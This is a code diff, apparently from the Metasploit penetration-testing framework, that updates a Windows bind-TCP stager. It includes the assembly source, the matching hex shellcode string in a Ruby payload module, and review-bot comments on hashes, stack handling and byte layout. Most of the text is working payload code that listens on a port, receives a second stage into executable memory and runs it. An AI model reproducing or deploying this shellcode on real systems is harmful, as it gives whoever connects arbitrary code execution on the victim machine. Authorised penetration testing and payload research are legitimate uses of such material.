diff --git a/external/source/shellcode/windows/stager_bind_tcp_nx.asm b/external/source/shellcode/windows/stager_bind_tcp_nx.asm index 9d9b9f0f67..07f0afff08 100644 --- a/external/source/shellcode/windows/stager_bind_tcp_nx.asm +++ b/external/source/shellcode/windows/stager_bind_tcp_nx.asm @@ -95,7 +95,7 @@ mov ebp, esp call LLoadWinsock %define FN_RECV [ebp + 24] -%define FN_SEND [ebp + 28] +%define FN_CLOSE [ebp + 28] %define FN_ACCEPT [ebp + 32] %define FN_BIND [ebp + 36] %define FN_LISTEN [ebp + 40] @@ -106,13 +106,13 @@ LWSDataSegment: ;======================== dd 0x190 ; used by wsastartup dd 0xe71819b6 ; recv [ebp + 24] -dd 0xe97019a4 ; send [ebp + 28] +dd 0x79c679e7 ; closesocket [ebp + 28] dd 0x498649e5 ; accept [ebp + 32] dd 0xc7701aa4 ; bind [ebp + 36] dd 0xe92eada4 ; listen [ebp + 40] dd 0xadf509d9 ; WSASocketA [ebp + 44] dd 0x3bfcedcb ; WSAStartup [ebp + 48] -db "WS2_32", 0x00 +db "ws2_32", 0x00 ;======================== LLoadWinsock: @@ -135,13 +135,15 @@ Looper: mov [esi + ecx * 4], eax ; stack segment to store addresses loop Looper +; Initialize winsock LWSAStartup: ; WSAStartup (0x101, DATA) sub esp, [edi] push esp push dword [edi] call FN_WSASTART xor eax, eax - + +; Create the socket LWSASocketA: ; WSASocketA (2,1,0,0,0,0) push eax push eax @@ -154,6 +156,7 @@ LWSASocketA: ; WSASocketA (2,1,0,0,0,0) call FN_WSASOCK mov edi, eax +; Bind to the specified port LBind: xor ebx, ebx push ebx @@ -165,20 +168,28 @@ LBind: push edi call FN_BIND +; Listen for new connections LListen: push ebx push edi call FN_LISTEN +; Accept the client connection LAccept: push ebx push esp push edi call FN_ACCEPT - mov edi, eax -LAllocateMemory: ; VirtualAlloc(NULL,size,MEM_COMMIT,PAGE_EXECUTE_READWRITE) +; Close the listening socket +LClose: + push ebx + push edi + mov edi, eax + call FN_CLOSE +; VirtualAlloc(NULL,size,MEM_COMMIT,PAGE_EXECUTE_READWRITE) +LAllocateMemory: push byte 0x40 pop esi push esi ; PAGE_EXECUTE_READWRITE=0x40 
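Review bot: The replacement entry `dd 0x79c679e7 ; closesocket [ebp + 28]` gives no hint of which hashing routine produced it, so a maintainer cannot regenerate or verify the constant from this file; the resolver that consumes the table lies outside this hunk. A short comment above the table such as `; API name hashes — must match the hashing loop in LLoadWinsock; regenerate with the same routine when an entry changes` would close that gap. The lowercasing of `db "ws2_32", 0x00` also changes bytes without a stated reason; if the case matters to the loader or to a consumer of the assembled blob, say so in a comment, otherwise it reads as a stray edit.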
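Review bot: In the new `LClose` block the leading `push ebx` pushes a dword that `closesocket` never consumes — it takes a single stdcall argument (the socket from `push edi`) and pops only that — so the zero is left on the stack for the rest of the stager; nothing in this hunk reads it, so it appears to be dead and dropping it would save a byte. The interleaving `push edi` / `mov edi, eax` / `call FN_CLOSE` is correct but non-obvious, since the listener is pushed before edi is overwritten with accept's return value; a comment would help, e.g. `; push the listening socket before edi is replaced by the accepted client socket`. Note that `mov edi, eax` is unconditional, so if accept failed edi holds INVALID_SOCKET and the later recv fails silently — acceptable for a minimal stager, but worth a `; no error check: accept failure falls through to a failing recv` note. The stager's entry and resolver are outside this hunk.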
@@ -193,11 +204,12 @@ LAllocateMemory: ; VirtualAlloc(NULL,size,MEM_COMMIT,PAGE_EXECUTE_READWRITE) call [ebp+12] mov ebx, eax - LRecvLength: ; recv(s, buff, 4, 0) push byte 0x00 ; flags push 4096 ; length push ebx ; buffer push dword edi ; socket call FN_RECV ; recv() + +LExecuteStage: call ebx diff --git a/modules/payloads/stagers/windows/bind_tcp.rb b/modules/payloads/stagers/windows/bind_tcp.rb index 37d77f1667..26299f688f 100644 --- a/modules/payloads/stagers/windows/bind_tcp.rb +++ b/modules/payloads/stagers/windows/bind_tcp.rb @@ -1,5 +1,5 @@ ## -# $Id$ +# $Id: bind_nx_tcp.rb 5625 2008-08-11 22:51:28Z hdm $ ## ## @@ -26,7 +26,7 @@ module BindTcp def initialize(info = {}) super(merge_info(info, 'Name' => 'Bind TCP Stager', - 'Version' => '$Revision$', + 'Version' => '$Revision: 5625 $', 'Description' => 'Listen for a connection', 'Author' => ['hdm', 'skape'], 'License' => MSF_LICENSE, 
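Review bot: The existing comment `LRecvLength: ; recv(s, buff, 4, 0)` no longer matches the code, which does `push 4096 ; length`, and the new `LExecuteStage:` label sits directly after a single recv whose return value is never checked, so whatever that one call delivered — possibly less than the stage, or nothing at all on error — is what `call ebx` executes. That is inherent to this minimal stager rather than introduced here, but the new label is the right place to record it: `; executes whatever the single recv() above returned; the handler side must deliver a stage (or intermediate loader) that fits in one recv`. While touching the block, correct the comment to `; recv(s, buff, 4096, 0)`. The VirtualAlloc call that sets up ebx begins before this hunk.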
@@ -51,16 +51,17 @@ module BindTcp "\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e"+ "\x4e\x0e\xec\xff\xd6\x89\xc7\x53\x68\x54\xca\xaf\x91\xff\xd6\x81"+ "\xec\x00\x01\x00\x00\x50\x57\x56\x53\x89\xe5\xe8\x27\x00\x00\x00"+ - "\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4\x19\x70\xe9\xe5\x49\x86\x49"+ + "\x90\x01\x00\x00\xb6\x19\x18\xe7\xe7\x79\xc6\x79\xe5\x49\x86\x49"+ "\xa4\x1a\x70\xc7\xa4\xad\x2e\xe9\xd9\x09\xf5\xad\xcb\xed\xfc\x3b"+ - "\x57\x53\x32\x5f\x33\x32\x00\x5b\x8d\x4b\x20\x51\xff\xd7\x89\xdf"+ + "\x77\x73\x32\x5f\x33\x32\x00\x5b\x8d\x4b\x20\x51\xff\xd7\x89\xdf"+ "\x89\xc3\x8d\x75\x14\x6a\x07\x59\x51\x53\xff\x34\x8f\xff\x55\x04"+ "\x59\x89\x04\x8e\xe2\xf2\x2b\x27\x54\xff\x37\xff\x55\x30\x31\xc0"+ "\x50\x50\x50\x50\x40\x50\x40\x50\xff\x55\x2c\x89\xc7\x31\xdb\x53"+ "\x53\x68\x02\x00\x22\x11\x89\xe0\x6a\x10\x50\x57\xff\x55\x24\x53"+ - "\x57\xff\x55\x28\x53\x54\x57\xff\x55\x20\x89\xc7\x6a\x40\x5e\x56"+ - "\xc1\xe6\x06\x56\xc1\xe6\x08\x56\x6a\x00\xff\x55\x0c\x89\xc3\x6a"+ - "\x00\x68\x00\x10\x00\x00\x53\x57\xff\x55\x18\xff\xd3" + "\x57\xff\x55\x28\x53\x54\x57\xff\x55\x20\x53\x57\x89\xc7\xff\x55"+ + "\x1c\x6a\x40\x5e\x56\xc1\xe6\x06\x56\xc1\xe6\x08\x56\x6a\x00\xff"+ + "\x55\x0c\x89\xc3\x6a\x00\x68\x00\x10\x00\x00\x53\x57\xff\x55\x18"+ + "\xff\xd3" } )) end
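Review bot: The hex blob is a hand-transcribed copy of the assembled stager, and nothing in the file ties it to the .asm it was built from; the bytes do line up with the assembly side of this commit (`\xe7\x79\xc6\x79` is 0x79c679e7 little-endian, `\x77\x73\x32\x5f\x33\x32` is "ws2_32", and `\x53\x57\x89\xc7\xff\x55\x1c` is the new push ebx / push edi / mov edi,eax / call [ebp+28] sequence), but a comment above the 'Payload' string naming the source file and the assembler command, e.g. `# assembled from external/source/shellcode/windows/stager_bind_tcp_nx.asm; re-check bytes after any change there`, would let the next person verify it. The change inserts 5 bytes after the bind call, while the sockaddr port bytes `\x68\x02\x00\x22\x11` sit in unchanged context before the insertion, so the LPORT entry in the module's 'Offsets' table (outside this hunk) should still be valid — worth confirming rather than assuming. The enclosing initialize method starts before this hunk.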